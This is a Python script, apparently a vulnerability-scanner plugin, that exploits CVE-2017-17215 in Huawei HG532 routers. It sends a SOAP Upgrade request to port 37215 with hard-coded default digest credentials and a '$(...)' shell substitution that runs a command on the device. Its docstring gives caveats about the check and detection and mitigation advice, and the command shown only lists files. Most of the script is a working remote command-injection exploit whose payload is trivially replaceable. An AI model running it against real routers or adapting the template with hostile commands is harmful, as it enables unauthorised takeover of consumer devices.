# coding:utf-8
# Reference: https://www.exploit-db.com/exploits/43414
import requests
from requests.auth import HTTPDigestAuth

def run(url):
    """Probe a host for CVE-2017-17215 (Huawei HG532 UPnP command injection).

    Posts a SOAP ``Upgrade`` request to ``<url>:37215/ctrlt/DeviceUpgrade_1``
    using HTTP digest auth with the fixed credentials ``dslf-config`` /
    ``admin``. The ``NewStatusURL`` element carries a ``$(...)`` shell
    substitution, so this is an active, state-changing check rather than a
    passive fingerprint: the injected command redirects its output to
    ``/tmp/b4`` on the device.

    Args:
        url: Scheme and host only (no port, no trailing slash); the port and
            path are appended to it verbatim.

    Returns:
        The string ``"huawei HG532 router rce cve-2017-17215"`` when the reply
        is HTTP 200 and its body contains ``"WANPPPConnection"``; otherwise
        ``False``.

    Notes:
        * The verdict rests on the HTTP reply alone. Nothing here reads
          ``/tmp/b4`` back, so a positive result means the endpoint accepted
          the request, not that execution was observed.
        * ``False`` covers every non-matching reply. Presumably that includes
          devices whose credentials were changed, so it is not evidence of
          patched firmware -- confirm by other means.
        * ``requests`` exceptions (5 s timeout, connection errors) are not
          caught here and propagate to the caller, which keeps "could not
          test" distinct from "tested, no match".
        * For detection, the same traits identify this traffic: a POST to
          port 37215, path ``/ctrlt/DeviceUpgrade_1``, with ``$(`` inside
          ``NewStatusURL`` or ``NewDownloadURL``. The request depends on the
          port being reachable and the default credentials being accepted,
          so filtering the port and changing those credentials remove both
          preconditions.
    """
    # Command placed inside the $(...) substitution; the original author
    # tagged it "mips".
    probe_cmd = "busybox ls > /tmp/b4"

    # SOAP envelope split around the injection point; the joined text is
    # unchanged from the single-literal form.
    soap_head = (
        '<?xml version="1.0" ?>\n'
        '    <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">\n'
        '    <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">\n'
        '    <NewStatusURL>$('
    )
    soap_tail = (
        ')</NewStatusURL>\n'
        '<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n'
        '</u:Upgrade>\n'
        '    </s:Body>\n'
        '    </s:Envelope>'
    )
    soap_body = soap_head + probe_cmd + soap_tail

    endpoint = url + ":37215/ctrlt/DeviceUpgrade_1"
    digest = HTTPDigestAuth("dslf-config", 'admin')
    resp = requests.post(endpoint, timeout=5, auth=digest, data=soap_body)

    # Status is checked first so the body is only decoded for a 200 reply.
    if resp.status_code == 200 and "WANPPPConnection" in resp.text:
        return "huawei HG532 router rce cve-2017-17215"
    return False


if __name__ == "__main__":
    # Script entry point: run the check once against a private
    # (192.168.0.0/16) address and print the verdict string or False.
    target = "http://192.168.127.137"
    verdict = run(target)
    print(verdict)
